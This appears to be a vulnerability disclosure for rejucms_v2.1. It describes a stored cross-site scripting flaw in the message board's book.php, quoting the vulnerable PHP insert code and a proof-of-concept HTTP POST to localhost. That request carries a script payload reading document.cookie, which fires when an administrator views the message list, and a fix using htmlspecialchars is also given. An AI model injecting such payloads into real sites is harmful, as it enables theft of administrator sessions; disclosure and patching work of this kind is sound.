Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
59 lines (43 sloc) 1.98 KB
There is a storage xss vulnerability in rejucms_v2.1
Description:
There is a storage xss vulnerability in /WWW/rejucms_v2.1/book.php
Vulnerability reasons:
Part of the source code of the message board:
1. Part of the code for the front of processing of the website(/WWW/rejucms_v2.1/book.php )
...
if(isset($_POST['submit'])){
null_back($_POST['userid'],'请输入姓名');
null_back($_POST['content'],'请输入内容');
$data['userid'] = $_POST['userid'];
$data['content'] =addslashes($_POST['content']);
$data['time'] =date('y-m-d h:i:s',time());
$str = arrtoinsert($data);
$sql = 'insert into rjcms_book ('.$str[0].') values ('.$str[1].')';//Storaged xss vulnerability (Obviously)
if(mysql_query($sql)){
alert_href('留言成功!','book.php');
}
else{
alert_back('注册失败');
}
}
...
We can find that the script filtering is not strict.
Storaged xss vulnerability caused by variable s directly stored into the database.
2.This vulnerability will be triggered when an administrator browses /WWW/rejucm_v2.1/admin/cms_book.php
clicking:http://127.0.0.1/rejucms_v2.1/admin/cms_book.php
POC:
POST /rejucm_v2.1/admin/book.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/rejucm_v2.1/admin/book.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Cookie: PHPSESSID=jntjholjqlbl2lld6hn24f1c56; Hm_lvt_1b228034eab3f86498adfd4e9d337209=1532789518; Hm_lpvt_1b228034eab3f86498adfd4e9d337209=1532790980
Connection: close
Upgrade-Insecure-Requests: 1
userid=test&content=test%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=%E6%8F%90%E4%BA%A4
Repair method:
Reference:htmlspecialchars(addslashes($variable))
You can’t perform that action at this time.